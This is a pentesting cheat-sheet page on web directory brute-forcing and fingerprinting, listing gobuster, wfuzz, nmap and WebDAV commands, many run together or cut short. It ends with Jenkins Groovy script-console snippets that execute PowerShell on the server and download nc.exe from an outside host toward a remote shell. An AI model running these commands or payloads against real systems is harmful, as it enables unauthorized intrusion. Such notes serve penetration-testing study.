Skip to content

Web Application Directory bruteforcing / fingerprinting

What is Directory Bruteforcing?

Directory brute-forcing is a technique used in cybersecurity to systematically guess and test directories or folders within a web server or application. This method involves trying various directory names or paths in an attempt to discover hidden or unprotected resources. By using automated tools or scripts, attackers can exhaustively search for sensitive files, configuration files, or directories containing valuable information. Directory brute-forcing poses a significant security risk as it can lead to unauthorized access, data breaches, or exploitation of vulnerabilities within the target system. Organizations often employ measures like access controls, web application firewalls, and security monitoring to mitigate the risks associated with directory brute-forcing attacks.

What is Fingerprinting?

Fingerprinting is the systematic identification of software, frameworks, libraries, and configurations used to build a website or web service. It's akin to recognizing the unique "fingerprint" left behind by specific technologies. This process typically involves analyzing HTTP headers, response codes, URL structures, JavaScript files, and other artifacts to deduce details about the underlying infrastructure and software stack. Fingerprinting aids in understanding potential vulnerabilities, compatibility issues, and the overall security posture of web applications.

Tools and Commands

gobuster -u http://ip -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50gobuster -u http://ip/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.phpgobuster -s "200,204,301,302,307,403,500" -w /usr/share/seclists/Discovery/Web_Content/common.txt -u http://gobuster -s "200,204,301,302,307,403,500"  -u http://XXXX -wgobuster -u http://ip -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40Gobuster comprehensive directory bustinggobuster -s 200,204,301,302,307,403 -u iop -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'Gobuster quick directory bustinggobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZwfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ wfuzz -c -z range,1-65535 --hl=2 http://ip:60000/url.php?path=1 -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ​
 nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip https://x.x.x.x
WebdavTest incorrect permissions:​$ cadaver http://$ip$ davtest http://$ip​
Jenking groovy codeTesting to see if we have code execution…​def sout = new StringBuffer(), serr = new StringBuffer()def proc = 'powershell.exe $PSVERSIONTABLE'.execute()proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println "out> $sout err> $serr"
NC upload in jenkin Server​def process = "powershell -command Invoke-WebRequest 'http://ip/nc.exe' -OutFile nc.exe".execute();println("${process.text}");